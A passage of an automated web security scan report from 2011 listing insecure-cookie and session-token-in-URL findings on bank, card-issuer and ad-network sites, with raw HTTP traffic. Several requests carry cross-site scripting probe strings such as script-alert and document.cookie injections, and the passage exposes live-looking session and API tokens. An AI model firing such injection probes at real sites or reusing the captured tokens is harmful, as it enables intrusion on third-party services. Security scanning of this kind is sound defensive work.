10.157. https://www.wellsfargo.com/wachovia/autoloans/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/autoloans/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:07 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=B965DA8A5CA67FE6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=Cy8nNKrPS11fYm6SXpppznVZQ17rp91BLhF2hTyJpBCypZg1n0Yl!720006441; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110203051807719562312; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:07 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1614945290.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.158. https://www.wellsfargo.com/wachovia/insurance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:09 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=F9ABF2DBD3379DE1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=YNFZNKrRzR7z1CTMzBGK8QfhZP4cHvwyRx3KLp84T4ht2RGqXt1Y!1501562554; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518091458514995; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:09 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1497504778.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.159. https://www.wellsfargo.com/wachovia/mortgage/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/mortgage/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/mortgage/index?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:01 GMT
Content-length: 5748
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:01 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1346509834.16927.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.160. https://www.wellsfargo.com/wachovia/wealthmanagement/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/wealthmanagement/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:20 GMT
Content-length: 4878
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=BAFB13EBB5A11093; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=fkPGNKrcBBsf0h1ybNSh7LPWfcv1h35wwbw3KGvLHP3bckNb1jYg!-819821412; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-2011020305182097829883; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:20 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1296178186.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wachovia to Wells Fargo Inter
...[SNIP]...

10.161. https://www.zionsbank.com/ichecking_landing.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.zionsbank.com
Path:   /ichecking_landing.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ichecking_landing.jsp HTTP/1.1
Host: www.zionsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 15:55:18 GMT
Content-type: text/html;charset=ISO-8859-1
Connection: close
Set-Cookie: lid=32f0cfc6e213a410d7efcde3f83e508b;path=/;domain=.zionsbank.com;
Set-Cookie: plid=6ee7930a72c58f63c025e4f8bc6c26a4;expires=Fri, 03-Feb-2012 15:55:18 GMT;path=/;domain=.zionsbank.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">


<html lang="en">

<head>
<!-- Google Website Optimi
...[SNIP]...

10.162. https://www134.americanexpress.com/consumertravel/travel.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www134.americanexpress.com
Path:   /consumertravel/travel.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumertravel/travel.do HTTP/1.1
Host: www134.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:07:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742052409531; path=/; expires=Sun, 07-Feb-16 14:07:32 GMT; domain=.americanexpress.com
Location: https://axptravel.americanexpress.com/consumertravel/travel.do
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.163. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www152.americanexpress.com
Path:   /premium/credit-card-travel-insurance/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-card-travel-insurance/home.do HTTP/1.1
Host: www152.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:07:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742053028698; path=/; expires=Sun, 07-Feb-16 14:07:33 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.164. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www209.americanexpress.com
Path:   /merchant/mainpagedom/authreg_showMainpage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merchant/mainpagedom/authreg_showMainpage.do HTTP/1.1
Host: www209.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:08:20 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Location: https://www209.americanexpress.com/merchant/mainpagedom/jumppage.jsp?TYPE=33554432&REALMOID=06-36577fc6-fad0-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$igR5UgqAztly2benjPhgw8%2bn1VWKCX1bCZfPwEgJ%2fJkIgErkX7L%2bPcd4oYgdRXKQ&TARGET=$SM$https%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo
Content-Length: 655
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww309-443=369887754.47873.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www209.americanexpress.com/merchant/mai
...[SNIP]...

10.165. https://www217.americanexpress.com/cards/home.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www217.americanexpress.com
Path:   /cards/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/home.do HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:08:30 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742110979749; path=/; expires=Sun, 07-Feb-16 14:08:30 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/cards/home.do
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.166. https://www217.americanexpress.com/cards/shopping/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www217.americanexpress.com
Path:   /cards/shopping/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/shopping/index.jsp HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:08:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742114367376; path=/; expires=Sun, 07-Feb-16 14:08:34 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/cards/shopping/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


11. Session token in URL
There are 193 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=1518&token=FOCI1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 16:31:31 GMT; Path=/
Set-Cookie: cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1; Domain=.contextweb.com; Expires=Fri, 08-Jan-2016 16:31:31 GMT; Path=/
Content-Type: image/gif
Date: Thu, 03 Feb 2011 16:31:30 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

11.2. http://c.chango.com/collector/am/pixel

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://c.chango.com
Path:   /collector/am/pixel

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /collector/am/pixel?url=http%3A%2F%2Ftag.admeld.com%2Fmatch%3Fadmeld_adprovider_id%3D333%26external_user_id%3D2d1cbd00-2b4b-11e0-9a94-00259009a9c2&amid=6acccca4-d0e4-464e-a824-f67cb28d5556&token=2d1cbd00-2b4b-11e0-9a94-00259009a9c2&pageURL=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F80%2Faccuweather%2F300x250%2Faccuweather_btf%3Ft%3D1296847504442%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fhurricane.accuweather.com%252Fhurricane%252Findex.asp%253F722b7%252522%25253E%25253Cscript%25253Ealert%28document.cookie%29%25253C%252Fscript%25253E9e1b639a6b3%253D1%26refer%3Dhttp%253A%252F%252Fburp%252Fshow%252F82&referrer=http%3A%2F%2Fhurricane.accuweather.com%2Fhurricane%2Findex.asp%3F722b7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E9e1b639a6b3%3D1 HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296847504442&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhurricane.accuweather.com%2Fhurricane%2Findex.asp%3F722b7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E9e1b639a6b3%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F82
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_t=1; _i_tm=1; _i_ox=1; _i_ab=1; _i_gid=1; _i_sl=1; _t=2d1cbd00-2b4b-11e0-9a94-00259009a9c2; _i_admeld=1

Response

HTTP/1.1 302 Found
Date: Fri, 04 Feb 2011 19:23:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0
Location: http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=2d1cbd00-2b4b-11e0-9a94-00259009a9c2
Server: TornadoServer/1.1


11.3. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:39 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ba6gnf15v1.app325a; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=493
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<td class="topnavLinkCell" align="left" title="Become a Coordinator"
onmouseover="mouseoverNavLineItem(this);"
onmouseout="mouseoutNavLineItem(this);"
onclick="clickLinkInTableCell(this);">
<a tabindex="" onclick="return false;"
onfocus="focusNavLineItem(this);"
onblur="blurNavLineItem(this);"
class="topnavLinkCellLink" href="https://secure3.convio.net/tacs/site/TRR/DaffodilDays/DDFY10Pennsylvania?JServSessionIdr004=ba6gnf15v1.app325a&amp;pg=ptype&amp;fr_id=26972">
Become a Coordinator</a>
...[SNIP]...

11.4. http://dev.virtualearth.net/services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation?latitude=39.95448399067298&longitude=-75.18206790089607&level=20&spinDirection=%22NoSpin%22&orientation=%22North%22&token=RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2&culture=%22en-us%22&format=json&rid=1296730383991& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-TraceID: 9a0832e328e04f2ab84af26f2ba259e7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001310
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:38:07 GMT
Content-Length: 1150

function _f1296730383991(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.ImageryMetadata.PublicTypes.BirdsEyeSearchResponse","Scene":{"S":35778879,"O":0,"Q":"03201010322","RI":36815,"L":2
...[SNIP]...

11.5. http://dev.virtualearth.net/services/v1/geocodeservice/geocodeservice.asmx/Geocode

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /services/v1/geocodeservice/geocodeservice.asmx/Geocode

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/v1/geocodeservice/geocodeservice.asmx/Geocode?count=10&query=%2219101%22&landmark=&addressLine=&locality=&postalTown=&adminDistrict=&district=&postalCode=&countryRegion=&mapBounds=%2263.58767529470318,%20-63.720703125000014,%205.00339434502215,%20-129.63867187500003%22&currentLocation=&curLocAccuracy=&entityTypes=&rankBy=&token=RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2&culture=%22en-us%22&format=json&rid=1296730153542& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-TraceID: 8c05997ab6484051ae3d93178592584e
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001310,BL2M001803,BL2M001802,BL2M001252,BL2M001820,BL2M001815
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:38:06 GMT
Content-Length: 1580

function _f1296730153542(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.Geocoding.GeocodingResponse","Results":[{"Name":"19101, PA","Type":132,"BestLocation":{"Precision":1,"Coordinates"
...[SNIP]...

11.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3c.20101212190742.04&session=1296727732182&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1296727990252& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M001306
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:01:40 GMT
Content-Length: 155

LogCredCB1296727990252({"sessionId" : "AvAnHBF9C5FDPqa2lN3XMTgltO_Bc-zzMSxZpAVj9-YhWrde3iEosg0e1-cEUUu2", "authenticationResultCode" : "ValidCredentials"})

11.7. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:32 +0000
Cache-Control: max-age=108, must-revalidate
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.8. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.9. http://fls.doubleclick.net/activityi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=2176035;type=hsbcb533;cat=hsbcb628;ord=1;num=8000465589575.47? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.us.hsbc.com/1/2/3/business?home=business
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 03 Feb 2011 18:42:16 GMT
Expires: Thu, 03 Feb 2011 18:42:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2986

